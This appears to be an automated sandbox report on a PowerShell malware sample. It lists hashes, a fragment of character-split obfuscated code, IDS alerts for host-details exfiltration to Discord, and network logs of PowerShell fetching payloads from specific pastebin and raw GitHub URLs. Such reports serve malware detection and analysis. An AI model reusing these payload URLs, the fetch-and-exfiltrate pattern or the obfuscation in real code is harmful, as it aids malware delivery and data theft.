                                                            Preview:...................................FL..................F.".. ......Yd...........z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....O`...............t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BOY............................d...A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......EW)BOY...............................R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BOY.............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BOY.............................RD.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BOY......................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BOY......................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BOY.......0..........

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6CPDP131N15X4O4RV2ZY.temp

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6222
                                                            Entropy (8bit):3.713765270714863
                                                            Encrypted:false
                                                            SSDEEP:48:tJRQ1RFCPWU23t/ukvhkvklCywXtzRyeil1ESogZoPxTRyeil+ESogZoPF1:HSFCPP8MkvhkvCCtX7yeiRH6vyeiEH6D
                                                            MD5:DEBCBC9652955F6D7D48FDE96EFE302D
                                                            SHA1:EC30BE6AD650BB207B1F8E632685EE0E5545E910
                                                            SHA-256:96DFE2071F5D29D6B8CF4C7B4DABBB93470312D6B9B1B711BAB877B645B4897F
                                                            SHA-512:130DE66B2B33A6588B0FDE8E713A64D96E2A045702A2BA3062C98ABE1FA3D2F0123D46391E434E6D770F1EBF6CD436F0A4AE12BE2DF7CEAA684DB6B1EF747883
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ......Yd...........z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....O`...............t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BOY............................d...A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......EW)BOY...............................R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BOY.............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BOY.............................RD.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BOY......................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BOY......................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BOY.......0..........

                                                            Static File Info

                                                            General

                                                            File type:ASCII text, with very long lines (4783)
                                                            Entropy (8bit):4.657754160814389
                                                            TrID:
                                                              File name:cr_asm_phshop..ps1
                                                              File size:7'971 bytes
                                                              MD5:9b9b244463f60b1dac6de55348e5f8ba
                                                              SHA1:807d2d5798c6e8c38005ec67aa99047d376a8248
                                                              SHA256:0951b829656b1290815cd18149305f6abca2a5b4b22c465dcf903af632790cdf
                                                              SHA512:9b78a64af4959aa7b895555c1064044d81958ace9325f1f06a34a343d419fd3c5b3c749c94120cb5d4ccc1731f3fd71bb0f429b5bedec7869dd3086ecbe2bea1
                                                              SSDEEP:96:ZaEgu/HHge+oC6INM48ZNMcJ++KpFsB1UEb3CBqZz+E6tNMuUI+W6h2I6:ZaevAOBCMFM4wpFshbwqUdMZP2H
                                                              TLSH:A7F17DB5076092B0E48387C6C66D32B692B9C7B730583C658BE21D4F7D5AC9770780B6
                                                              File Content Preview:$P1 = 'S'; $P2 = 'y'; $P3 = 's'; $P4 = 't'; $P5 = 'e'; $P6 = 'm'.$Sys = $P1 + $P2 + $P3 + $P4 + $P5 + $P6..$M1 = 'M'; $M2 = 'a'; $M3 = 'n'; $M4 = 'a'; $M5 = 'g'; $M6 = 'e'; $M7 = 'm'; $M8 = 'e'; $M9 = 'n'; $M10 = 't'.$Mgmt = $M1 + $M2 + $M3 + $M4 + $M5 +

                                                              File Icon

                                                              Icon Hash:3270d6baae77db44

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-15T18:09:11.100795+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.849707162.159.128.233443TCP
                                                              2024-10-15T18:09:26.951719+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.849718162.159.128.233443TCP
                                                              2024-10-15T18:09:34.743607+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.849719162.159.128.233443TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 15, 2024 18:09:09.853949070 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:09.853997946 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:09.854058027 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:09.858441114 CEST4970880192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:09.862903118 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:09.862927914 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:09.863359928 CEST8049708172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:09.863426924 CEST4970880192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:09.866897106 CEST4970880192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:09.871721029 CEST8049708172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:10.510473967 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:10.510556936 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:10.514266014 CEST8049708172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:10.514585018 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:10.514600039 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:10.514909983 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:10.528544903 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:10.555119991 CEST4970880192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:10.575412989 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:10.634291887 CEST49710443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:10.634335041 CEST44349710172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:10.634582043 CEST49710443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:10.638926029 CEST49710443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:10.638940096 CEST44349710172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:10.663265944 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:10.711379051 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:10.738065004 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:10.738091946 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:11.100740910 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:11.100837946 CEST44349707162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:11.100954056 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:11.301457882 CEST44349710172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:11.301549911 CEST49710443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:11.384381056 CEST49710443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:11.384422064 CEST44349710172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:11.384901047 CEST44349710172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:11.426373005 CEST49710443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:11.467432976 CEST44349710172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:11.505357981 CEST49707443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:11.607686043 CEST44349710172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:11.607774019 CEST44349710172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:11.607871056 CEST49710443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:11.656142950 CEST49710443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:11.698529005 CEST4971180192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:11.703605890 CEST8049711185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:11.703672886 CEST4971180192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:11.705703020 CEST4971180192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:11.710611105 CEST8049711185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.337660074 CEST8049711185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.337927103 CEST4971180192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:12.339835882 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:12.339876890 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.339941978 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:12.340261936 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:12.340276957 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.340615034 CEST8049711185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.340666056 CEST4971180192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:12.342828035 CEST8049711185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.968362093 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.968461990 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:12.972537994 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:12.972549915 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.972985983 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:12.981898069 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:13.027395010 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.112174988 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.112381935 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.112447977 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:13.112462044 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.112782955 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.112817049 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.112845898 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.112875938 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:13.112884045 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.112914085 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:13.120881081 CEST44349713185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:13.121133089 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:13.143325090 CEST49713443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:17.975755930 CEST4971480192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:17.980710983 CEST8049714172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:17.980879068 CEST4971480192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:17.982753992 CEST4971480192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:17.987665892 CEST8049714172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.190901041 CEST8049714172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.191517115 CEST8049714172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.191608906 CEST4971480192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:19.191989899 CEST8049714172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.192042112 CEST4971480192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:19.202445030 CEST49715443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:19.202495098 CEST44349715172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.202565908 CEST49715443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:19.206239939 CEST49715443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:19.206258059 CEST44349715172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.831795931 CEST44349715172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.831959009 CEST49715443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:19.836818933 CEST49715443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:19.836846113 CEST44349715172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.837260008 CEST44349715172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.848270893 CEST49715443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:19.895415068 CEST44349715172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.998270988 CEST44349715172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:19.998392105 CEST44349715172.67.19.24192.168.2.8
                                                              Oct 15, 2024 18:09:20.000453949 CEST49715443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:20.019660950 CEST49715443192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:20.061202049 CEST4971680192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:20.066334009 CEST8049716185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:20.066416025 CEST4971680192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:20.066643953 CEST4971680192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:20.071588039 CEST8049716185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:20.680052996 CEST8049716185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:20.680362940 CEST4971680192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:20.681757927 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:20.681807041 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:20.681893110 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:20.681900024 CEST8049716185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:20.681953907 CEST4971680192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:20.682288885 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:20.682301044 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:20.685998917 CEST8049716185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.328768015 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.328850985 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:21.330871105 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:21.330879927 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.331206083 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.332364082 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:21.379400015 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.459827900 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.460036039 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.460086107 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:21.460123062 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.460371017 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.460418940 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:21.460431099 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.460768938 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.460813046 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:21.460824013 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.460887909 CEST44349717185.199.110.133192.168.2.8
                                                              Oct 15, 2024 18:09:21.460932970 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:21.482917070 CEST49717443192.168.2.8185.199.110.133
                                                              Oct 15, 2024 18:09:26.036506891 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:26.036540031 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.036617041 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:26.037053108 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:26.037067890 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.714821100 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.715002060 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:26.716521978 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:26.716543913 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.716948032 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.718532085 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:26.763406992 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.763583899 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:26.763595104 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.951802015 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.951977015 CEST44349718162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:26.952105999 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:26.959830999 CEST49718443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:32.022497892 CEST4970880192.168.2.8172.67.19.24
                                                              Oct 15, 2024 18:09:33.896337986 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:33.896384001 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:33.896449089 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:33.897011995 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:33.897023916 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:34.510577917 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:34.510672092 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:34.515182018 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:34.515197992 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:34.515481949 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:34.516503096 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:34.563395977 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:34.563483953 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:34.563492060 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:34.743612051 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:34.743683100 CEST44349719162.159.128.233192.168.2.8
                                                              Oct 15, 2024 18:09:34.743753910 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:34.746290922 CEST49719443192.168.2.8162.159.128.233
                                                              Oct 15, 2024 18:09:39.761002064 CEST4971480192.168.2.8172.67.19.24

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 15, 2024 18:09:09.837855101 CEST5178953192.168.2.81.1.1.1
                                                              Oct 15, 2024 18:09:09.841691017 CEST5392453192.168.2.81.1.1.1
                                                              Oct 15, 2024 18:09:09.845164061 CEST53517891.1.1.1192.168.2.8
                                                              Oct 15, 2024 18:09:09.848625898 CEST53539241.1.1.1192.168.2.8
                                                              Oct 15, 2024 18:09:11.688839912 CEST5878453192.168.2.81.1.1.1
                                                              Oct 15, 2024 18:09:11.697463989 CEST53587841.1.1.1192.168.2.8
                                                              Oct 15, 2024 18:09:23.978055000 CEST5388853192.168.2.81.1.1.1
                                                              Oct 15, 2024 18:09:23.985496998 CEST53538881.1.1.1192.168.2.8

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 15, 2024 18:09:09.837855101 CEST192.168.2.81.1.1.10xf8d0Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:09.841691017 CEST192.168.2.81.1.1.10x64a7Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:11.688839912 CEST192.168.2.81.1.1.10x58e4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:23.978055000 CEST192.168.2.81.1.1.10x8d0bStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 15, 2024 18:09:09.845164061 CEST1.1.1.1192.168.2.80xf8d0No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:09.845164061 CEST1.1.1.1192.168.2.80xf8d0No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:09.845164061 CEST1.1.1.1192.168.2.80xf8d0No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:09.848625898 CEST1.1.1.1192.168.2.80x64a7No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:09.848625898 CEST1.1.1.1192.168.2.80x64a7No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:09.848625898 CEST1.1.1.1192.168.2.80x64a7No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:09.848625898 CEST1.1.1.1192.168.2.80x64a7No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:09.848625898 CEST1.1.1.1192.168.2.80x64a7No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:11.697463989 CEST1.1.1.1192.168.2.80x58e4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:11.697463989 CEST1.1.1.1192.168.2.80x58e4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:11.697463989 CEST1.1.1.1192.168.2.80x58e4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:11.697463989 CEST1.1.1.1192.168.2.80x58e4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:23.985496998 CEST1.1.1.1192.168.2.80x8d0bNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:23.985496998 CEST1.1.1.1192.168.2.80x8d0bNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:23.985496998 CEST1.1.1.1192.168.2.80x8d0bNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 18:09:23.985496998 CEST1.1.1.1192.168.2.80x8d0bNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • discord.com
                                                              • pastebin.com
                                                              • raw.githubusercontent.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.849708172.67.19.24805884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 18:09:09.866897106 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 18:09:10.514266014 CEST472INHTTP/1.1 301 Moved Permanently
                                                              Date: Tue, 15 Oct 2024 16:09:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: keep-alive
                                                              Cache-Control: max-age=3600
                                                              Expires: Tue, 15 Oct 2024 17:09:10 GMT
                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                              Server: cloudflare
                                                              CF-RAY: 8d3112703aaa287b-DFW
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.849711185.199.110.133805884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 18:09:11.705703020 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 18:09:12.337660074 CEST541INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              Content-Length: 0
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 16:09:12 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdal2120140-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1729008552.280287,VS0,VE0
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Expires: Tue, 15 Oct 2024 16:14:12 GMT
                                                              Vary: Authorization,Accept-Encoding


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.849714172.67.19.24806592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 18:09:17.982753992 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 18:09:19.190901041 CEST472INHTTP/1.1 301 Moved Permanently
                                                              Date: Tue, 15 Oct 2024 16:09:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: keep-alive
                                                              Cache-Control: max-age=3600
                                                              Expires: Tue, 15 Oct 2024 17:09:18 GMT
                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                              Server: cloudflare
                                                              CF-RAY: 8d3112a2e9a8e779-DFW
